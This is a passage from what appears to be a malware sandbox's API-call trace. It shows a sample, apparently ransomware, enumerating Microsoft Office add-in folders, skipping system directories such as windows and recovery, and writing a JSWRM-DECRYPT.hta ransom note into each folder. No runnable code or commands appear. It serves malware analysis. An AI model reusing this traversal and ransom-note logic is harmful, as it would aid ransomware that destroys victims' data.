lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.457] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x680214, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.457] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.457] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="zh-HANT", cAlternateFileName="")) returned 1 [0123.457] lstrcmpiW (lpString1="zh-HANT", lpString2=".") returned 1 [0123.457] lstrcmpiW (lpString1="zh-HANT", lpString2="..") returned 1 [0123.457] lstrcmpiW (lpString1="zh-HANT", lpString2="...") returned 1 [0123.457] lstrcmpiW (lpString1="zh-HANT", lpString2="windows") returned 1 [0123.458] lstrcmpiW (lpString1="zh-HANT", lpString2="recovery") returned 1 [0123.458] lstrcmpiW (lpString1="zh-HANT", lpString2="perflogs") returned 1 [0123.458] lstrcmpiW (lpString1="zh-HANT", lpString2="documents and settings") returned 1 [0123.458] lstrcmpiW (lpString1="zh-HANT", lpString2="$RECYCLE.BIN") returned 1 [0123.458] lstrcmpiW (lpString1="zh-HANT", lpString2="system volume information") returned 1 [0123.458] lstrcmpiW (lpString1="zh-HANT", lpString2="msocache") returned 1 [0123.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\zh-hant\\jswrm-decrypt.hta")) returned 0xffffffff [0123.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\zh-hant\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.459] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.459] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.460] CloseHandle (hObject=0x338) returned 1 [0123.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\zh-hant\\jswrm-decrypt.hta")) returned 0x20 [0123.460] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANT\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x403fcb60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.461] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.461] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x403fcb60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.461] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.461] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.461] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403fcb60, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x403fcb60, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x403fcb60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.461] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.461] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa5581c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xdaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.461] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.461] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.461] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.461] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.461] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.461] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.461] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.462] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6bd3439, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bd3439, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c1f8d1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.462] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00af60a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.462] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.463] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.463] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.463] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12b7378, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12b7378, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x80040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.463] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.463] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12b7378, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12b7378, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x80040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.463] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.463] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00af60a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa5581c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="zh-HANT", cAlternateFileName="")) returned 0 [0123.464] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0123.464] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ff5e5a6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ff5e5a6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ff5e5a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.464] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.464] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ff5e5a6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ff5e5a6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ff5e5a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0123.464] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0123.464] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2283d0f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3688, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSOSEC.DLL", cAlternateFileName="")) returned 1 [0123.464] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2=".") returned 1 [0123.464] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="..") returned 1 [0123.464] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="...") returned 1 [0123.464] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="windows") returned -1 [0123.464] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="recovery") returned -1 [0123.464] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="perflogs") returned -1 [0123.464] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="documents and settings") returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="system volume information") returned -1 [0123.465] lstrcmpiW (lpString1="MSOSEC.DLL", lpString2="msocache") returned 1 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSEC.DLL", lpUsedDefaultChar=0x0) returned 10 [0123.465] 